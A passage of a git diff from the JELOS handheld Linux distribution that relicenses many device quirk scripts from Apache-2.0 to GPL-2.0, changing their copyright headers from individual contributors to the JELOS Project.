2023-present BrooksyTech (https://github.com/brooksytech) +# SPDX-License-Identifier: GPL-2.0 +# Copyright (C) 2022-present - The JELOS Project (https://github.com/JustEnoughLinuxOS) . /etc/profile diff --git a/packages/hardware/quirks/devices/Anbernic RG353P/010-governors b/packages/hardware/quirks/devices/Anbernic RG353P/010-governors index eb19d9ccf..e1a462241 100755 --- a/packages/hardware/quirks/devices/Anbernic RG353P/010-governors +++ b/packages/hardware/quirks/devices/Anbernic RG353P/010-governors @@ -1,6 +1,6 @@ #!/bin/sh -# SPDX-License-Identifier: Apache-2.0 -# Copyright (C) 2023-present Fewtarius (https://github.com/fewtarius) +# SPDX-License-Identifier: GPL-2.0 +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) cat </storage/.config/profile.d/010-governors CPU_FREQ=("/sys/devices/system/cpu/cpufreq/policy0") diff --git a/packages/hardware/quirks/devices/Anbernic RG353P/020-gpios b/packages/hardware/quirks/devices/Anbernic RG353P/020-gpios index 147b1d2ab..357fcb108 100755 --- a/packages/hardware/quirks/devices/Anbernic RG353P/020-gpios +++ b/packages/hardware/quirks/devices/Anbernic RG353P/020-gpios @@ -1,6 +1,6 @@ #!/bin/sh -# SPDX-License-Identifier: Apache-2.0 -# Copyright (C) 2021-present Fewtarius (https://github.com/fewtarius) +# SPDX-License-Identifier: GPL-2.0 +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) cat </storage/.config/profile.d/020-gpios DEVICE_WIFI="0" diff --git a/packages/hardware/quirks/devices/Anbernic RG353P/030-suspend_mode b/packages/hardware/quirks/devices/Anbernic RG353P/030-suspend_mode index bb0533c6f..addf08ec4 100755 --- a/packages/hardware/quirks/devices/Anbernic RG353P/030-suspend_mode +++ b/packages/hardware/quirks/devices/Anbernic RG353P/030-suspend_mode @@ -1,6 +1,6 @@ #!/bin/sh -# SPDX-License-Identifier: Apache-2.0 -# Copyright (C) 2022-present Fewtarius +# SPDX-License-Identifier: GPL-2.0 +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) . /etc/profile.d/001-functions diff --git a/packages/hardware/quirks/devices/Anbernic RG353P/040-display b/packages/hardware/quirks/devices/Anbernic RG353P/040-display index c9dcc2f8a..107ddab32 100755 --- a/packages/hardware/quirks/devices/Anbernic RG353P/040-display +++ b/packages/hardware/quirks/devices/Anbernic RG353P/040-display @@ -1,6 +1,6 @@ #!/bin/bash -# SPDX-License-Identifier: Apache-2.0 -# Copyright (C) 2021-present Fewtarius (https://github.com/fewtarius) +# SPDX-License-Identifier: GPL-2.0 +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) . /etc/profile diff --git a/packages/hardware/quirks/devices/Anbernic RG353P/050-game_configs b/packages/hardware/quirks/devices/Anbernic RG353P/050-game_configs index 97a2de3e0..e96f4f3c8 100755 --- a/packages/hardware/quirks/devices/Anbernic RG353P/050-game_configs +++ b/packages/hardware/quirks/devices/Anbernic RG353P/050-game_configs @@ -1,6 +1,6 @@ -# SPDX-License-Identifier: Apache-2.0 -# Copyright (C) 2023-present BrooksyTech (https://github.com/brooksytech) +# SPDX-License-Identifier: GPL-2.0 +# Copyright (C) 2022-present - The JELOS Project (https://github.com/JustEnoughLinuxOS) . /etc/profile diff --git a/packages/hardware/quirks/devices/Anbernic RG353V/001-device_config b/packages/hardware/quirks/devices/Anbernic RG353V/001-device_config index 5ab68cbc4..43c88d32e 100755 --- a/packages/hardware/quirks/devices/Anbernic RG353V/001-device_config +++ b/packages/hardware/quirks/devices/Anbernic RG353V/001-device_config @@ -1,6 +1,6 @@ #!/bin/bash -# SPDX-License-Identifier: Apache-2.0 -# Copyright (C) 2021-present Fewtarius (https://github.com/fewtarius) +# SPDX-License-Identifier: GPL-2.0 +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) cat </storage/.config/profile.d/001-deviceconfig DEVICE_FAKE_JACKSENSE="true" diff --git a/packages/hardware/quirks/devices/Anbernic RG353V/010-governors b/packages/hardware/quirks/devices/Anbernic RG353V/010-governors index 148642e8d..437984c28 100755 --- a/packages/hardware/quirks/devices/Anbernic RG353V/010-governors +++ b/packages/hardware/quirks/devices/Anbernic RG353V/010-governors @@ -1,6 +1,6 @@ #!/bin/sh -# SPDX-License-Identifier: Apache-2.0 -# Copyright (C) 2023-present Fewtarius (https://github.com/fewtarius) +# SPDX-License-Identifier: GPL-2.0 +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) cat </storage/.config/profile.d/010-governors # FREQ governors diff --git a/packages/hardware/quirks/devices/Anbernic RG353V/020-gpios b/packages/hardware/quirks/devices/Anbernic RG353V/020-gpios index 7e11f7f72..608532312 100755 --- a/packages/hardware/quirks/devices/Anbernic RG353V/020-gpios +++ b/packages/hardware/quirks/devices/Anbernic RG353V/020-gpios @@ -1,6 +1,6 @@ #!/bin/sh -# SPDX-License-Identifier: Apache-2.0 -# Copyright (C) 2021-present Fewtarius (https://github.com/fewtarius) +# SPDX-License-Identifier: GPL-2.0 +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) cat </storage/.config/profile.d/020-gpios DEVICE_WIFI="5" diff --git a/packages/hardware/quirks/devices/Anbernic RG353V/030-suspend_mode b/packages/hardware/quirks/devices/Anbernic RG353V/030-suspend_mode index bb0533c6f..addf08ec4 100755 --- a/packages/hardware/quirks/devices/Anbernic RG353V/030-suspend_mode +++ b/packages/hardware/quirks/devices/Anbernic RG353V/030-suspend_mode @@ -1,6 +1,6 @@ #!/bin/sh -# SPDX-License-Identifier: Apache-2.0 -# Copyright (C) 2022-present Fewtarius +# SPDX-License-Identifier: GPL-2.0 +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) . /etc/profile.d/001-functions diff --git a/packages/hardware/quirks/devices/Anbernic RG353V/040-display b/packages/hardware/quirks/devices/Anbernic RG353V/040-display index c9dcc2f8a..107ddab32 100755 --- a/packages/hardware/quirks/devices/Anbernic RG353V/040-display +++ b/packages/hardware/quirks/devices/Anbernic RG353V/040-display @@ -1,6 +1,6 @@ #!/bin/bash -# SPDX-License-Identifier: Apache-2.0 -# Copyright (C) 2021-present Fewtarius (https://github.com/fewtarius) +# SPDX-License-Identifier: GPL-2.0 +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) . /etc/profile diff --git a/packages/hardware/quirks/devices/Anbernic RG503/001-device_config b/packages/hardware/quirks/devices/Anbernic RG503/001-device_config index 518a5b458..0faaa862b 100755 --- a/packages/hardware/quirks/devices/Anbernic RG503/001-device_config +++ b/packages/hardware/quirks/devices/Anbernic RG503/001-device_config @@ -1,6 +1,6 @@ #!/bin/sh -# SPDX-License-Identifier: Apache-2.0 -# Copyright (C) 2021-present Fewtarius (https://github.com/fewtarius) +# SPDX-License-Identifier: GPL-2.0 +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) cat </storage/.config/profile.d/001-deviceconfig DEVICE_FAKE_JACKSENSE="false" diff --git a/packages/hardware/quirks/devices/Anbernic RG503/010-governors b/packages/hardware/quirks/devices/Anbernic RG503/010-governors index eb19d9ccf..e1a462241 100755 --- a/packages/hardware/quirks/devices/Anbernic RG503/010-governors +++ b/packages/hardware/quirks/devices/Anbernic RG503/010-governors @@ -1,6 +1,6 @@ #!/bin/sh -# SPDX-License-Identifier: Apache-2.0 -# Copyright (C) 2023-present Fewtarius (https://github.com/fewtarius) +# SPDX-License-Identifier: GPL-2.0 +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) cat </storage/.config/profile.d/010-governors CPU_FREQ=("/sys/devices/system/cpu/cpufreq/policy0") diff --git a/packages/hardware/quirks/devices/Anbernic RG503/020-gpios b/packages/hardware/quirks/devices/Anbernic RG503/020-gpios index 147b1d2ab..357fcb108 100755 --- a/packages/hardware/quirks/devices/Anbernic RG503/020-gpios +++ b/packages/hardware/quirks/devices/Anbernic RG503/020-gpios @@ -1,6 +1,6 @@ #!/bin/sh -# SPDX-License-Identifier: Apache-2.0 -# Copyright (C) 2021-present Fewtarius (https://github.com/fewtarius) +# SPDX-License-Identifier: GPL-2.0 +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) cat </storage/.config/profile.d/020-gpios DEVICE_WIFI="0" diff --git a/packages/hardware/quirks/devices/Anbernic RG503/030-suspend_mode b/packages/hardware/quirks/devices/Anbernic RG503/030-suspend_mode index bb0533c6f..addf08ec4 100755 --- a/packages/hardware/quirks/devices/Anbernic RG503/030-suspend_mode +++ b/packages/hardware/quirks/devices/Anbernic RG503/030-suspend_mode @@ -1,6 +1,6 @@ #!/bin/sh -# SPDX-License-Identifier: Apache-2.0 -# Copyright (C) 2022-present Fewtarius +# SPDX-License-Identifier: GPL-2.0 +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) . /etc/profile.d/001-functions diff --git a/packages/hardware/quirks/devices/Anbernic RG503/040-display b/packages/hardware/quirks/devices/Anbernic RG503/040-display index c9dcc2f8a..107ddab32 100755 --- a/packages/hardware/quirks/devices/Anbernic RG503/040-display +++ b/packages/hardware/quirks/devices/Anbernic RG503/040-display @@ -1,6 +1,6 @@ #!/bin/bash -# SPDX-License-Identifier: Apache-2.0 -# Copyright (C) 2021-present Fewtarius (https://github.com/fewtarius) +# SPDX-License-Identifier: GPL-2.0 +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) . /etc/profile diff --git a/packages/hardware/quirks/devices/Anbernic RG503/050-game_configs b/packages/hardware/quirks/devices/Anbernic RG503/050-game_configs index 4908b8ada..f43838a03 100755 --- a/packages/hardware/quirks/devices/Anbernic RG503/050-game_configs +++ b/packages/hardware/quirks/devices/Anbernic RG503/050-game_configs @@ -1,6 +1,6 @@ -# SPDX-License-Identifier: Apache-2.0 -# Copyright (C) 2023-present BrooksyTech (https://github.com/brooksytech) +# SPDX-License-Identifier: GPL-2.0 +# Copyright (C) 2022-present - The JELOS Project (https://github.com/JustEnoughLinuxOS) . /etc/profile diff --git a/packages/hardware/quirks/devices/Anbernic RG552/001-device_config b/packages/hardware/quirks/devices/Anbernic RG552/001-device_config index 92c688d80..cdf299d83 100755 --- a/packages/hardware/quirks/devices/Anbernic RG552/001-device_config +++ b/packages/hardware/quirks/devices/Anbernic RG552/001-device_config @@ -1,6 +1,6 @@ #!/bin/sh -# SPDX-License-Identifier: Apache-2.0 -# Copyright (C) 2021-present Fewtarius (https://github.com/fewtarius) +# SPDX-License-Identifier: GPL-2.0 +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) cat </storage/.config/profile.d/001-device_config # Device Features diff --git a/packages/hardware/quirks/devices/Anbernic RG552/010-governors b/packages/hardware/quirks/devices/Anbernic RG552/010-governors index aba96e6d4..e3d3da8ee 100755 --- a/packages/hardware/quirks/devices/Anbernic RG552/010-governors +++ b/packages/hardware/quirks/devices/Anbernic RG552/010-governors @@ -1,7 +1,6 @@ #!/bin/sh -# SPDX-License-Identifier: Apache-2.0 -# Copyright (C) 2023-present Fewtarius (https://github.com/fewtarius) -# Copyright (C) 2023-present Brooksytech +# SPDX-License-Identifier: GPL-2.0 +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) cat </storage/.config/profile.d/010-governors CPU_FREQ=("/sys/devices/system/cpu/cpufreq/policy0" "/sys/devices/system/cpu/cpufreq/policy4") diff --git a/packages/hardware/quirks/devices/Anbernic RG552/020-fan_control b/packages/hardware/quirks/devices/Anbernic RG552/020-fan_control index 67efd2949..810e1d714 100755 --- a/packages/hardware/quirks/devices/Anbernic RG552/020-fan_control +++ b/packages/hardware/quirks/devices/Anbernic RG552/020-fan_control @@ -1,6 +1,6 @@ #!/bin/sh -# SPDX-License-Identifier: Apache-2.0 -# Copyright (C) 2021-present Fewtarius (https://github.com/fewtarius) +# SPDX-License-Identifier: GPL-2.0 +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) cat </storage/.config/profile.d/020-fan_control DEVICE_HAS_FAN="true" diff --git a/packages/hardware/quirks/devices/Anbernic RG552/020-gpios b/packages/hardware/quirks/devices/Anbernic RG552/020-gpios index 54ff0284e..6250e3e37 100755 --- a/packages/hardware/quirks/devices/Anbernic RG552/020-gpios +++ b/packages/hardware/quirks/devices/Anbernic RG552/020-gpios @@ -1,6 +1,6 @@ #!/bin/sh -# SPDX-License-Identifier: Apache-2.0 -# Copyright (C) 2021-present Fewtarius (https://github.com/fewtarius) +# SPDX-License-Identifier: GPL-2.0 +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) cat </storage/.config/profile.d/020-gpios DEVICE_JACK="8" diff --git a/packages/hardware/quirks/devices/Anbernic RG552/030-enable_wifi b/packages/hardware/quirks/devices/Anbernic RG552/030-enable_wifi index 5dddfb617..73a8134a6 100755 --- a/packages/hardware/quirks/devices/Anbernic RG552/030-enable_wifi +++ b/packages/hardware/quirks/devices/Anbernic RG552/030-enable_wifi @@ -1,7 +1,7 @@ #!/bin/sh # SPDX-License-Identifier: GPL-2.0-or-later -# Copyright (C) 2023-present BrooksyTech (https://github.com/brooksytech) +# Copyright (C) 2022-present - The JELOS Project (https://github.com/JustEnoughLinuxOS) . /etc/profile.d/001-functions diff --git a/packages/hardware/quirks/devices/Anbernic RG552/040-hdmi b/packages/hardware/quirks/devices/Anbernic RG552/040-hdmi index cc929500d..ce01028ee 100755 --- a/packages/hardware/quirks/devices/Anbernic RG552/040-hdmi +++ b/packages/hardware/quirks/devices/Anbernic RG552/040-hdmi @@ -1,7 +1,7 @@ #!/bin/bash # SPDX-License-Identifier: GPL-2.0-or-later -# Copyright (C) 2023-present BrooksyTech (https://github.com/brooksytech) +# Copyright (C) 2022-present - The JELOS Project (https://github.com/JustEnoughLinuxOS) . /storage/.config/profile.d/001-device_config diff --git a/packages/hardware/quirks/devices/Anbernic RG552/050-audio_path b/packages/hardware/quirks/devices/Anbernic RG552/050-audio_path index 41c4faa4c..14042766d 100755 --- a/packages/hardware/quirks/devices/Anbernic RG552/050-audio_path +++ b/packages/hardware/quirks/devices/Anbernic RG552/050-audio_path @@ -1,6 +1,6 @@ #!/bin/sh -# SPDX-License-Identifier: Apache-2.0 -# Copyright (C) 2021-present Fewtarius (https://github.com/fewtarius) +# SPDX-License-Identifier: GPL-2.0 +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) cat </storage/.config/profile.d/002-audio_path DEVICE_AUDIO_MIXER="DAC" diff --git a/packages/hardware/quirks/devices/Anbernic RG552/bin/fancontrol b/packages/hardware/quirks/devices/Anbernic RG552/bin/fancontrol index 8bc86db04..54316ae22 100755 --- a/packages/hardware/quirks/devices/Anbernic RG552/bin/fancontrol +++ b/packages/hardware/quirks/devices/Anbernic RG552/bin/fancontrol @@ -1,6 +1,6 @@ #!/bin/bash -# SPDX-License-Identifier: Apache-2.0 -# Copyright (C) 2021-present Fewtarius (https://github.com/fewtarius) +# SPDX-License-Identifier: GPL-2.0 +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) . /etc/profile diff --git a/packages/hardware/quirks/devices/GPD G1619-04/050-modifiers b/packages/hardware/quirks/devices/GPD G1619-04/050-modifiers index aebf80475..c01942f17 100755 --- a/packages/hardware/quirks/devices/GPD G1619-04/050-modifiers +++ b/packages/hardware/quirks/devices/GPD G1619-04/050-modifiers @@ -1,6 +1,6 @@ #!/bin/sh -# SPDX-License-Identifier: Apache-2.0 -# Copyright (C) 2022-present Fewtarius +# SPDX-License-Identifier: GPL-2.0 +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) cat </storage/.config/profile.d/050-modifiers DEVICE_FUNC_KEYA_MODIFIER=="ABS_RZ" diff --git a/packages/hardware/quirks/devices/Hardkernel ODROID-GO-Ultra/001-device_config b/packages/hardware/quirks/devices/Hardkernel ODROID-GO-Ultra/001-device_config index f6a352b26..eff112076 100644 --- a/packages/hardware/quirks/devices/Hardkernel ODROID-GO-Ultra/001-device_config +++ b/packages/hardware/quirks/devices/Hardkernel ODROID-GO-Ultra/001-device_config @@ -1,6 +1,6 @@ #!/bin/bash -# SPDX-License-Identifier: Apache-2.0 -# Copyright (C) 2021-present Fewtarius (https://github.com/fewtarius) +# SPDX-License-Identifier: GPL-2.0 +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) cat </storage/.config/profile.d/001-deviceconfig DEVICE_FAKE_JACKSENSE="true" diff --git a/packages/hardware/quirks/devices/Hardkernel ODROID-GO-Ultra/050-audio_path b/packages/hardware/quirks/devices/Hardkernel ODROID-GO-Ultra/050-audio_path index 05bf8a68d..a1e160fd5 100644 --- a/packages/hardware/quirks/devices/Hardkernel ODROID-GO-Ultra/050-audio_path +++ b/packages/hardware/quirks/devices/Hardkernel ODROID-GO-Ultra/050-audio_path @@ -1,6 +1,6 @@ #!/bin/sh -# SPDX-License-Identifier: Apache-2.0 -# Copyright (C) 2021-present Fewtarius (https://github.com/fewtarius) +# SPDX-License-Identifier: GPL-2.0 +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) cat </storage/.config/profile.d/002-audio_path DEVICE_PLAYBACK_PATH_SPK="SPK" diff --git a/packages/hardware/quirks/devices/Hardkernel ODROID-GO-Ultra/050-game_configs b/packages/hardware/quirks/devices/Hardkernel ODROID-GO-Ultra/050-game_configs index 050796837..ad4341ccc 100644 --- a/packages/hardware/quirks/devices/Hardkernel ODROID-GO-Ultra/050-game_configs +++ b/packages/hardware/quirks/devices/Hardkernel ODROID-GO-Ultra/050-game_configs @@ -1,5 +1,5 @@ -# SPDX-License-Identifier: Apache-2.0 -# Copyright (C) 2023-present BrooksyTech (https://github.com/brooksytech) +# SPDX-License-Identifier: GPL-2.0 +# Copyright (C) 2022-present - The JELOS Project (https://github.com/JustEnoughLinuxOS) . /etc/profile diff --git a/packages/hardware/quirks/devices/Hardkernel ODROID-N2/001-device_config b/packages/hardware/quirks/devices/Hardkernel ODROID-N2/001-device_config index c36784006..40afabccd 100755 --- a/packages/hardware/quirks/devices/Hardkernel ODROID-N2/001-device_config +++ b/packages/hardware/quirks/devices/Hardkernel ODROID-N2/001-device_config @@ -1,6 +1,6 @@ #!/bin/sh -# SPDX-License-Identifier: Apache-2.0 -# Copyright (C) 2021-present Fewtarius (https://github.com/fewtarius) +# SPDX-License-Identifier: GPL-2.0 +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) cat </storage/.config/profile.d/001-deviceconfig # Device Features diff --git a/packages/hardware/quirks/devices/Hardkernel ODROID-N2/050-audio_path b/packages/hardware/quirks/devices/Hardkernel ODROID-N2/050-audio_path index 3db271a64..cc8b8bdb6 100755 --- a/packages/hardware/quirks/devices/Hardkernel ODROID-N2/050-audio_path +++ b/packages/hardware/quirks/devices/Hardkernel ODROID-N2/050-audio_path @@ -1,6 +1,6 @@ #!/bin/sh -# SPDX-License-Identifier: Apache-2.0 -# Copyright (C) 2021-present Fewtarius (https://github.com/fewtarius) +# SPDX-License-Identifier: GPL-2.0 +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) cat </storage/.config/profile.d/002-audio_path DEVICE_PIPEWIRE_PROFILE="pro-audio" diff --git a/packages/hardware/quirks/devices/ODROID-GO Advance Black Edition/001-device_config b/packages/hardware/quirks/devices/ODROID-GO Advance Black Edition/001-device_config index b390996f9..7621a4d00 100644 --- a/packages/hardware/quirks/devices/ODROID-GO Advance Black Edition/001-device_config +++ b/packages/hardware/quirks/devices/ODROID-GO Advance Black Edition/001-device_config @@ -1,6 +1,6 @@ #!/bin/bash -# SPDX-License-Identifier: Apache-2.0 -# Copyright (C) 2023-present BrooksyTech (https://github.com/brooksytech) +# SPDX-License-Identifier: GPL-2.0 +# Copyright (C) 2022-present - The JELOS Project (https://github.com/JustEnoughLinuxOS) cat </storage/.config/profile.d/001-deviceconfig # Device Features diff --git a/packages/hardware/quirks/devices/ODROID-GO Advance Black Edition/050-game_configs b/packages/hardware/quirks/devices/ODROID-GO Advance Black Edition/050-game_configs index a73ed6077..79cd5552d 100644 --- a/packages/hardware/quirks/devices/ODROID-GO Advance Black Edition/050-game_configs +++ b/packages/hardware/quirks/devices/ODROID-GO Advance Black Edition/050-game_configs @@ -1,5 +1,5 @@ -# SPDX-License-Identifier: Apache-2.0 -# Copyright (C) 2023-present BrooksyTech (https://github.com/brooksytech) +# SPDX-License-Identifier: GPL-2.0 +# Copyright (C) 2022-present - The JELOS Project (https://github.com/JustEnoughLinuxOS) . /etc/profile diff --git a/packages/hardware/quirks/devices/ODROID-GO Advance/001-device_config b/packages/hardware/quirks/devices/ODROID-GO Advance/001-device_config index cdbedd735..9bd46c657 100644 --- a/packages/hardware/quirks/devices/ODROID-GO Advance/001-device_config +++ b/packages/hardware/quirks/devices/ODROID-GO Advance/001-device_config @@ -1,6 +1,6 @@ #!/bin/bash -# SPDX-License-Identifier: Apache-2.0 -# Copyright (C) 2021-present Fewtarius (https://github.com/fewtarius) +# SPDX-License-Identifier: GPL-2.0 +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) cat </storage/.config/profile.d/001-deviceconfig # Device Features diff --git a/packages/hardware/quirks/devices/ODROID-GO Advance/050-game_configs b/packages/hardware/quirks/devices/ODROID-GO Advance/050-game_configs index f75eaba85..6f64ff578 100644 --- a/packages/hardware/quirks/devices/ODROID-GO Advance/050-game_configs +++ b/packages/hardware/quirks/devices/ODROID-GO Advance/050-game_configs @@ -1,5 +1,5 @@ -# SPDX-License-Identifier: Apache-2.0 -# Copyright (C) 2023-present BrooksyTech (https://github.com/brooksytech) +# SPDX-License-Identifier: GPL-2.0 +# Copyright (C) 2022-present - The JELOS Project (https://github.com/JustEnoughLinuxOS) . /etc/profile diff --git a/packages/hardware/quirks/devices/ODROID-GO Super/001-device_config b/packages/hardware/quirks/devices/ODROID-GO Super/001-device_config index 087798da7..5f3794c28 100644 --- a/packages/hardware/quirks/devices/ODROID-GO Super/001-device_config +++ b/packages/hardware/quirks/devices/ODROID-GO Super/001-device_config @@ -1,6 +1,6 @@ #!/bin/bash -# SPDX-License-Identifier: Apache-2.0 -# Copyright (C) 2023-present BrooksyTech (https://github.com/brooksytech) +# SPDX-License-Identifier: GPL-2.0 +# Copyright (C) 2022-present - The JELOS Project (https://github.com/JustEnoughLinuxOS) cat </storage/.config/profile.d/001-deviceconfig # Device Features diff --git a/packages/hardware/quirks/devices/ODROID-GO Super/050-game_configs b/packages/hardware/quirks/devices/ODROID-GO Super/050-game_configs index 99318557a..1df1ecbe4 100644 --- a/packages/hardware/quirks/devices/ODROID-GO Super/050-game_configs +++ b/packages/hardware/quirks/devices/ODROID-GO Super/050-game_configs @@ -1,6 +1,6 @@ #!/bin/bash -# SPDX-License-Identifier: Apache-2.0 -# Copyright (C) 2023-present BrooksyTech (https://github.com/brooksytech) +# SPDX-License-Identifier: GPL-2.0 +# Copyright (C) 2022-present - The JELOS Project (https://github.com/JustEnoughLinuxOS) . /etc/profile diff --git a/packages/hardware/quirks/devices/Orange Pi 5/020-enable_usb_ports b/packages/hardware/quirks/devices/Orange Pi 5/020-enable_usb_ports index 901ca7143..c4cfc1924 100644 --- a/packages/hardware/quirks/devices/Orange Pi 5/020-enable_usb_ports +++ b/packages/hardware/quirks/devices/Orange Pi 5/020-enable_usb_ports @@ -1,6 +1,6 @@ #!/bin/sh -# SPDX-License-Identifier: Apache-2.0 -# Copyright (C) 2023-present Brooksytech (https://github.com/brooksytech) +# SPDX-License-Identifier: GPL-2.0 +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) # Enable verticle USB Port echo host > /sys/kernel/debug/usb/fc000000.usb/mode diff --git a/packages/hardware/quirks/devices/Powkiddy RGB10 MAX 3/050-audio_path b/packages/hardware/quirks/devices/Powkiddy RGB10 MAX 3/050-audio_path index a567f8cf5..0f5b3816d 100755 --- a/packages/hardware/quirks/devices/Powkiddy RGB10 MAX 3/050-audio_path +++ b/packages/hardware/quirks/devices/Powkiddy RGB10 MAX 3/050-audio_path @@ -1,6 +1,6 @@ #!/bin/sh -# SPDX-License-Identifier: Apache-2.0 -# Copyright (C) 2021-present Fewtarius (https://github.com/fewtarius) +# SPDX-License-Identifier: GPL-2.0 +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) cat </storage/.config/profile.d/002-audio_path DEVICE_PLAYBACK_PATH_SPK="HP" diff --git a/packages/hardware/quirks/devices/Powkiddy RGB10 MAX 3/050-game_configs b/packages/hardware/quirks/devices/Powkiddy RGB10 MAX 3/050-game_configs index 050796837..ad4341ccc 100755 --- a/packages/hardware/quirks/devices/Powkiddy RGB10 MAX 3/050-game_configs +++ b/packages/hardware/quirks/devices/Powkiddy RGB10 MAX 3/050-game_configs @@ -1,5 +1,5 @@ -# SPDX-License-Identifier: Apache-2.0 -# Copyright (C) 2023-present BrooksyTech (https://github.com/brooksytech) +# SPDX-License-Identifier: GPL-2.0 +# Copyright (C) 2022-present - The JELOS Project (https://github.com/JustEnoughLinuxOS) . /etc/profile diff --git a/packages/hardware/quirks/devices/Powkiddy RGB30/010-governors b/packages/hardware/quirks/devices/Powkiddy RGB30/010-governors index eb19d9ccf..e1a462241 100755 --- a/packages/hardware/quirks/devices/Powkiddy RGB30/010-governors +++ b/packages/hardware/quirks/devices/Powkiddy RGB30/010-governors @@ -1,6 +1,6 @@ #!/bin/sh -# SPDX-License-Identifier: Apache-2.0 -# Copyright (C) 2023-present Fewtarius (https://github.com/fewtarius) +# SPDX-License-Identifier: GPL-2.0 +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) cat </storage/.config/profile.d/010-governors CPU_FREQ=("/sys/devices/system/cpu/cpufreq/policy0") diff --git a/packages/hardware/quirks/devices/Powkiddy RGB30/020-gpios b/packages/hardware/quirks/devices/Powkiddy RGB30/020-gpios index 147b1d2ab..357fcb108 100755 --- a/packages/hardware/quirks/devices/Powkiddy RGB30/020-gpios +++ b/packages/hardware/quirks/devices/Powkiddy RGB30/020-gpios @@ -1,6 +1,6 @@ #!/bin/sh -# SPDX-License-Identifier: Apache-2.0 -# Copyright (C) 2021-present Fewtarius (https://github.com/fewtarius) +# SPDX-License-Identifier: GPL-2.0 +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) cat </storage/.config/profile.d/020-gpios DEVICE_WIFI="0" diff --git a/packages/hardware/quirks/devices/Powkiddy RGB30/030-suspend_mode b/packages/hardware/quirks/devices/Powkiddy RGB30/030-suspend_mode index bb0533c6f..addf08ec4 100755 --- a/packages/hardware/quirks/devices/Powkiddy RGB30/030-suspend_mode +++ b/packages/hardware/quirks/devices/Powkiddy RGB30/030-suspend_mode @@ -1,6 +1,6 @@ #!/bin/sh -# SPDX-License-Identifier: Apache-2.0 -# Copyright (C) 2022-present Fewtarius +# SPDX-License-Identifier: GPL-2.0 +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) . /etc/profile.d/001-functions diff --git a/packages/hardware/quirks/devices/Powkiddy RGB30/040-display b/packages/hardware/quirks/devices/Powkiddy RGB30/040-display index c9dcc2f8a..107ddab32 100755 --- a/packages/hardware/quirks/devices/Powkiddy RGB30/040-display +++ b/packages/hardware/quirks/devices/Powkiddy RGB30/040-display @@ -1,6 +1,6 @@ #!/bin/bash -# SPDX-License-Identifier: Apache-2.0 -# Copyright (C) 2021-present Fewtarius (https://github.com/fewtarius) +# SPDX-License-Identifier: GPL-2.0 +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) . /etc/profile diff --git a/packages/hardware/quirks/devices/Powkiddy RGB30/050-audio_path b/packages/hardware/quirks/devices/Powkiddy RGB30/050-audio_path index 42adac303..f5860cdb5 100755 --- a/packages/hardware/quirks/devices/Powkiddy RGB30/050-audio_path +++ b/packages/hardware/quirks/devices/Powkiddy RGB30/050-audio_path @@ -1,6 +1,6 @@ #!/bin/sh -# SPDX-License-Identifier: Apache-2.0 -# Copyright (C) 2021-present Fewtarius (https://github.com/fewtarius) +# SPDX-License-Identifier: GPL-2.0 +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) cat </storage/.config/profile.d/002-audio_path DEVICE_PLAYBACK_PATH_SPK="HP" diff --git a/packages/hardware/quirks/devices/Powkiddy RGB30/050-game_configs b/packages/hardware/quirks/devices/Powkiddy RGB30/050-game_configs index 97a2de3e0..e96f4f3c8 100755 --- a/packages/hardware/quirks/devices/Powkiddy RGB30/050-game_configs +++ b/packages/hardware/quirks/devices/Powkiddy RGB30/050-game_configs @@ -1,6 +1,6 @@ -# SPDX-License-Identifier: Apache-2.0 -# Copyright (C) 2023-present BrooksyTech (https://github.com/brooksytech) +# SPDX-License-Identifier: GPL-2.0 +# Copyright (C) 2022-present - The JELOS Project (https://github.com/JustEnoughLinuxOS) . /etc/profile diff --git a/packages/hardware/quirks/devices/Powkiddy RGB30/060-game_settings b/packages/hardware/quirks/devices/Powkiddy RGB30/060-game_settings index 104c96854..d058f2fb4 100755 --- a/packages/hardware/quirks/devices/Powkiddy RGB30/060-game_settings +++ b/packages/hardware/quirks/devices/Powkiddy RGB30/060-game_settings @@ -1,6 +1,6 @@ #!/bin/sh -# SPDX-License-Identifier: Apache-2.0 -# Copyright (C) 2023-present Fewtarius (https://github.com/fewtarius) +# SPDX-License-Identifier: GPL-2.0 +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) . /etc/profile.d/001-functions diff --git a/packages/hardware/quirks/devices/Powkiddy RK2023/010-governors b/packages/hardware/quirks/devices/Powkiddy RK2023/010-governors index eb19d9ccf..e1a462241 100755 --- a/packages/hardware/quirks/devices/Powkiddy 